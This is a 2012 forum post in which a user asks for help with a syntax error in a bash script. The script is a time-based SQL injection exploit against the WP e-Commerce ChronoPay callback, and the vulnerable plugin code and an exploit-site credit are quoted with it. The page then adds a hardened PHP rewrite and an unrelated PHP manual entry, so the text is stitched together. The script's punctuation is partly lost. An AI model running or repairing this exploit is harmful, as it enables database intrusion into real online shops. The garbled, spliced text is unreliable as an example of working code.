Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Syntax error near unexpected token `('

What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this->load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
./wp-e-commerce/wpsc-core/wpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
            }
 
 
./wp-e-commerce/wpsc-merchants/chronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
            // - this is by default '' and set only if explicitly stated
            //   inside Store Settings->Payments->General Settings->
            //   Chronopay->Edit->Security Key
            // - the problem is that there are more popular payment gateways listed (e.g.
            //   Google Checkout and PayPal), and if that setting is not explicitly set
            //   it opens the door wide to a potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill':
                        $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                                            `processed` = '2',
                                            `transactid` = '".$transaction_id."',
                                            `date` = '".time()."'
                                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
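
A hardened form of the callback check quoted in the post, as an added example (not code from the post, the advisory, or the plugin): it refuses an empty security key, compares the hash with `hash_equals`, and binds the request values instead of concatenating them into the query. The in-memory SQLite table `purchase_logs`, the function name `chronopay_rebill`, the demo key, and the rule that session ids are decimal digits are assumptions made for the example; it needs PHP 7.4+ with pdo_sqlite.

```php
<?php
// Added example, not plugin code. Constructed stand-ins: an in-memory SQLite
// table replaces WPSC_TABLE_PURCHASE_LOGS; $salt replaces get_option('chronopay_salt').

function chronopay_rebill(PDO $db, string $salt, array $post): bool
{
    // With an empty security key the hash is computable by anyone: fail closed.
    if ($salt === '') {
        return false;
    }
    $cs1 = (string) ($post['cs1'] ?? '');
    $cs3 = (string) ($post['cs3'] ?? '');
    $txn = trim((string) ($post['transaction_id'] ?? ''));

    // Same construction as on the page, compared strictly and in constant time.
    $expected = md5($salt . md5($cs1 . $salt));
    if (!hash_equals($expected, $cs3)) {
        return false;
    }
    // Assumption: session ids are decimal digits, so reject anything else.
    if (!ctype_digit($cs1)) {
        return false;
    }
    // Bound parameters: request values never become part of the SQL text.
    $stmt = $db->prepare(
        'UPDATE purchase_logs SET processed = 2, transactid = :txn, "date" = :now
         WHERE sessionid = :sid'
    );
    $stmt->execute([':txn' => $txn, ':now' => time(), ':sid' => $cs1]);
    return $stmt->rowCount() === 1;
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE purchase_logs (sessionid TEXT, processed INT, transactid TEXT, "date" INT)');
$db->exec("INSERT INTO purchase_logs VALUES ('1001', 1, '', 0)");

$sign = fn(string $salt, string $cs1): string => md5($salt . md5($cs1 . $salt));

$salt = 'constructed-demo-key';
$good = ['cs1' => '1001', 'cs3' => $sign($salt, '1001'), 'transaction_id' => 'T-1'];
$bad  = ['cs1' => 'not-a-number', 'cs3' => $sign('', 'not-a-number')];

var_dump(chronopay_rebill($db, $salt, $good)); // request signed with the configured key
var_dump(chronopay_rebill($db, '', $bad));     // no key configured on the server
var_dump(chronopay_rebill($db, $salt, $bad));  // request signed without the key
```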
 

_REQUEST(3)								 1							       _REQUEST(3)

$_REQUEST - HTTP Request variables

	An associative array that by default contains the contents of $_GET, $_POST and $_COOKIE.

       +---------+-----------------------------------------------------------------------------+
       | Version | Description                                                                 |
       +---------+-----------------------------------------------------------------------------+
       | 5.3.0   | Introduced request_order. This directive affects the contents of $_REQUEST. |
       | 4.3.0   | $_FILES information was removed from $_REQUEST.                             |
       | 4.1.0   | Introduced $_REQUEST.                                                       |
       +---------+-----------------------------------------------------------------------------+
       Note

	      This is a 'superglobal', or automatic global, variable. This simply means that it is available in all scopes  throughout	a  script.
	      There is no need to do global $variable; to access it within functions or methods.

       Note

	      When running on the command line, this will not include the argv and argc entries; these are present in the $_SERVER array.

       Note

	      The variables in $_REQUEST are provided to the script via the GET, POST, and COOKIE input mechanisms and therefore could be
	      modified by the remote user and cannot be trusted. The presence and order of variables listed in this array is defined according
	      to the PHP variables_order configuration directive.

       import_request_variables(3), Handling external variables, The filter extension.

PHP Documentation Group 													       _REQUEST(3)